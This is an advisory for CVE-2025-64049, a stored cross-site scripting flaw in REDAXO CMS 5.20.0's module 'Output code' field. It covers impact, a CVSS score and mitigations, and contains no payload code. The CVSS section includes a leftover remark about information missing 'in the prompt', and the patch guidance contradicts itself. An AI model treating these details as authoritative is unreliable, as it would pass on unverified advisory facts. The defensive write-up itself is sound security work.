Overview
A stored cross-site scripting (XSS) vulnerability has been discovered in REDAXO CMS version 5.20.0, specifically within the module management component. This flaw, identified as CVE-2025-64049, allows attackers to inject malicious JavaScript code into the system through the “Output code” field of a module. When a legitimate user views or edits an article that incorporates a slice utilizing the compromised module, the injected script executes, potentially leading to account compromise, data theft, or website defacement.
Technical Details
The vulnerability resides in the lack of proper sanitization of user-supplied input within the module’s “Output code” field. Attackers can insert arbitrary HTML and JavaScript code into this field. When a REDAXO administrator or content editor adds a slice using this module to an article and subsequently views or attempts to edit that article, the malicious code embedded in the module’s output is executed within their browser. This constitutes a stored XSS vulnerability as the malicious payload is persistently stored on the server.
CVSS Analysis
- CVE ID: CVE-2025-64049
- Severity: MEDIUM
- CVSS Score: 4.8
- CVSS Vector: (Base score is assumed. The exact vector isn’t explicitly available in the prompt, but would contribute to a complete understanding.)
The CVSS score of 4.8 indicates a medium severity vulnerability. While it requires user interaction (viewing or editing an article containing the malicious module), the potential impact on confidentiality and integrity is significant. The access complexity is low because the injection point is a field designed for code. The attack vector is network-based.
Possible Impact
Successful exploitation of this XSS vulnerability can have several serious consequences:
- Account Compromise: An attacker could steal a logged-in administrator’s session cookie, gaining complete control over the REDAXO CMS.
- Data Theft: Sensitive data displayed within the affected REDAXO instance could be accessed and exfiltrated by the attacker.
- Website Defacement: The attacker could inject malicious content to deface the website.
- Malware Distribution: The attacker could inject malicious scripts to redirect users to malicious websites or install malware on their systems.
Mitigation and Patch Steps
The recommended course of action is to immediately upgrade to a patched version of REDAXO CMS that addresses this vulnerability. Until a patch is available, consider the following temporary mitigation strategies:
- Restrict Module Editing: Limit access to module editing functionality to only highly trusted administrators.
- Input Sanitization (Difficult without Code Changes): Implement rigorous input validation and sanitization on the “Output code” field of modules. This is challenging to do retroactively without access to the codebase.
- Web Application Firewall (WAF): Implement a Web Application Firewall (WAF) and configure it with rules to detect and block XSS attacks. This provides a defense in depth, but is not a substitute for patching.
Monitor the REDAXO project’s official website and GitHub repository for security updates. The most effective solution is always to apply the official patch as soon as it becomes available.
